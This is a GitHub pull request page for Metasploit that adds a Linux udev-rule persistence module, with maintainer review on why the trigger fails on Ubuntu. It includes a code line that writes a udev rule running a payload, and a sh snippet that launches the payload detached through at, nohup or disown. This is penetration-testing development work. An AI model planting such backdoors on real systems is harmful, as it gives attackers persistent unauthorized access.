Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add modules/exploits/linux/local/udev_persistence.rb #19472

Open
wants to merge 1 commit into
base: master
Choose a base branch
from

Conversation

jvoisin
Copy link
Contributor

@jvoisin jvoisin commented Sep 18, 2024

Add a way to persist via udev rules.

Verification

  • Start msfconsole
  • Get a shell
  • use exploits/linux/local/udev_persistence
  • Reboot the target
  • Verify that you get a shell once the target comes back online

@jvoisin jvoisin mentioned this pull request Sep 19, 2024
17 tasks
@jheysel-r7 jheysel-r7 self-assigned this Oct 1, 2024
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the module @jvoisin! I started a payload handler but wasn't able to get this working by rebooting the target or by bringing up network interfaces manually or by attempting to trigger udev rules with udevadm trigger -v --subsystem-match=net

I was able to return a session by manually executing the payload file: /usr/bin/udev-check-updates but the persistence mechanism wasn't working for me.

I noticed some potential syntax errors, I'm wondering if there were maybe some changes made after you tested this? I've been testing on Ubuntu 22.04 (Linux 6.8.0-45-generic)

modules/exploits/linux/local/udev_persistence.rb Outdated Show resolved Hide resolved
modules/exploits/linux/local/udev_persistence.rb Outdated Show resolved Hide resolved
Copy link

github-actions bot commented Oct 1, 2024

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@jheysel-r7 jheysel-r7 removed their assignment Oct 7, 2024
@dledda-r7 dledda-r7 self-assigned this Oct 8, 2024
Copy link

github-actions bot commented Oct 8, 2024

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@dledda-r7
Copy link
Contributor

dledda-r7 commented Oct 9, 2024

Hello @jvoisin, tried the module but seems the rule is not triggered at boot time, the payload is written correctly and works, I will try to investigate further, would you mind adding the docs for this post module later? I opened a PR #19542 that you can use as base when it get landed.

UPDATE

it looks like in Ubuntu 22.04 there is no at preinstalled.

user@ubuntuvm01:~$ /usr/bin/at
-bash: /usr/bin/at: No such file or directory
user@ubuntuvm01:~$ /bin/at
-bash: /bin/at: No such file or directory
user@ubuntuvm01:~$

@jvoisin
Copy link
Contributor Author

jvoisin commented Oct 10, 2024

I added some documentation, and a check for the presence of /usr/bin/at

@dledda-r7 dledda-r7 added docs and removed needs-docs labels Oct 14, 2024
@dledda-r7
Copy link
Contributor

dledda-r7 commented Oct 15, 2024

I added some documentation, and a check for the presence of /usr/bin/at

I think we can get rid of the at dependency honestly and just providing the path to the script

write_file(datastore['BACKDOOR_PATH'], 'SUBSYSTEM=="net", KERNEL!="lo", RUN+="' + datastore['PAYLOAD_PATH']+'"')

I will do some tests.

@jvoisin
Copy link
Contributor Author

jvoisin commented Oct 15, 2024

It's non-trivial

@dledda-r7
Copy link
Contributor

dledda-r7 commented Oct 15, 2024

I see what you mean, I'm think we can make a child bash process with & and disown or using nohup directly, I'll try something now

Update

So i tried to play a bit with som bash scripting and maybe we can have a script like this

    backdoor = <<~EOF
      #!/bin/sh
      PAYLOAD_ENC="#{payload.encoded}"
      if [ -f /usr/bin/at ]; then
          echo sh -c "$PAYLOAD_ENC" | at -M now
      elif [ -f /usr/bin/nohup ]; then
          nohup sh -c "$PAYLOAD_ENC" > /dev/null 2>&1&
      else
          echo sh -c "$PAYLOAD_ENC" & disown | bash
      fi
    EOF
    upload_and_chmodx(datastore['PAYLOAD_PATH'], backdoor)

However for now I am still not able to trigger the rule on ubuntu 24.04 LTS, can you provide some details where you tested that? I also tried to change the default rules location but nothing.

@dledda-r7 dledda-r7 removed their assignment Oct 17, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
Status: Waiting on Contributor
Development

Successfully merging this pull request may close these issues.

3 participants